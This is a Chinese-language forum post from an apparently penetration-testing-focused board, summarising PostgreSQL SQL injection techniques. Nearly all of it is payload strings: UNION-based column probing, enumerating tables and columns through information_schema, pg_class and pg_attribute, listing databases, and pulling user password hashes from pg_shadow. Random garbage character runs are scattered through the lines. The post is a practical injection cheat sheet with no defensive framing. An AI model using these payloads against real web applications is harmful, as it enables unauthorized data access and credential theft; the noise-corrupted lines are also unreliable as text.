中国网络渗透测试联盟

标题: postgreSQL注入总结 [打印本页]

作者: admin    时间: 2013-10-13 12:57
标题: postgreSQL注入总结
结合了MSSQL MySQL Oracle的一些特点
! T, x9 j5 @3 J6 _, Y* f5 a

支持多语句执行,语句可以没有from

postgres用户是超级用户(创始人账户) 只有superuser有copy权限

注释: — , /**/
6 ^/ n: \' Y9 j1 a/ Q连接符: %20 , + , /**/

内置函数:: ]/ B6 a) _' `/ e( P5 [
current_database() //当前数据库名
$ Q- b" l/ c2 Ssession_user //会话用户) [4 A0 ]7 k. X& f; }" t- r
current_user //当前数据库用户# k$ d/ x; v  E
user //当前用户+ @. B( f' s2 |( K2 f
version() //数据库版本

Union注射:
8 g! M& T  w* y$ horder by n–
6 M8 }( h+ i: Xand 1=2 union select null,null,null–+ l4 m) F" I8 a4 z# `
and 1=2 union select ‘beach’,null,null–2 _6 O9 [3 g3 Q6 x* e8 q8 j
and 1=2 union select (select version()),null,null–

获取表名,字段名(新版本利用information_schema):, F( d5 H2 @$ }$ P* h& I
group_concat(table_name)
9 m% j" k7 |7 J; j1 p% h- mand 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–% m( Y. v# b, l. J
and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–# H1 j* O5 u6 L& j
(老版本)6 t( q$ X4 ?4 X3 y. z' I
pg_class.oid对应pg_attribute.attrelid
  b/ o# L% F4 K$ I1 epg_class.relname表名4 X+ Q0 a! d1 P0 G+ {! X
pg_attribute.attname字段名

select relname from pg_class获取表名! e1 w7 }! C/ t, G; ~( A* ], x
select oid from pg_class where 条件 获取参数1 j$ j3 I  z' z3 @3 O0 }; L& N1 B
select attname from pg_attribute where attrelid=’oid的值’ 获取字段名

实战:( q$ H6 t4 [+ z; \6 `( n$ q+ Q0 P0 x
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表! s# A. a) h4 A' C
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–3 z  O: g" z. z1 ]' V
由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136

and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名
! d/ X. D3 ^4 r! Y5 g3 D======================================================================. V0 z, M6 n/ k" C! O0 \
and 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库
$ N; @. F! C1 Sand 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2